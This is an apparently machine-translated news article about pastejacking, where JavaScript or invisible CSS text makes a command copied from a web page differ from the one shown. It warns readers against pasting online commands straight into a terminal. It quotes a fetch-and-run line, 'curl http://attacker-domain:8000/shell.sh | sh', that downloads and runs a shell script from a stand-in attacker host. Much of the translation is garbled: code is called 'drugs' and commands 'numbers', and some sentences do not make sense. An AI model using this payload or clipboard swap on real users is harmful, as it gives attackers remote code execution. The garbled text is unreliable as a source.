Beware of this scam that deceives people who publish and post drugs on the site – Tecnoblog

The proliferation of computers and systems has increased, but even simple procedures can be risky, even if it is a hassle-free process. copy and paste. It can hide commands from lines that seem inaccurate, and this can increase the security of your machine.

The glass of the table is in front of a screen with numbers
Copying numbers and putting them directly in a terminal is a bad idea (Photo: Kevin Ku / Unsplash)

The idea is simple: give different rules of page information or instructions, but hide behind commands that provide access to the system when placed directly in the flight. where. LUB Bleeping Computer shows two ways in which this is possible.

JavaScript replaces the copy

The certificate of concept by Gabriel Friedlander, founder of the security training platform Wizer, shows how this can be done.

On the learning page, it provides a simple Linux command:

sudo apt update

When copying and pasting commands, the resulting code is very different

curl http: // attacker-domain: 8000 / shell.sh | sh

In addition, the previous numbers even came with a broken line, which allowed him to be shot directly by the terminal, if he did not have a lock against it.

The next trick is a bit of JavaScript code, which inserts another text into the clipboard when copying the selected snippet.

CSS makes it invisible

JavaScript is not the only tool that can be used to hide bad numbers. It is also possible to do this using CSS.

Reddit user SwallowYourDreams provided the show. On the page, two simple commands seem to be copied.

ncha “I only command some friends”

echo “Copy and run me.”

When pasting, however, the third appears.

Echo “I only have some friends command”

echo “Haha, you just ran the command to commit. Your system is now back up. “

echo “Copy and run me.”

How did the third commandment come about? He was there all the time, you just could not see him. With two modes of change, this line becomes white and zero-size, but can also be selected by the mouse cursor.

How to avoid

The instructions are very simple: do not put any code published online directly into the terminal, no matter what the website looks like.

We know that math is often hard and repeating them can be a daunting task. To avoid the clutter, the best thing to do is put in the text first – even a good old Notepad will do.

If all goes well with it, print and paste it again, this time in the terminal.

Leave a Comment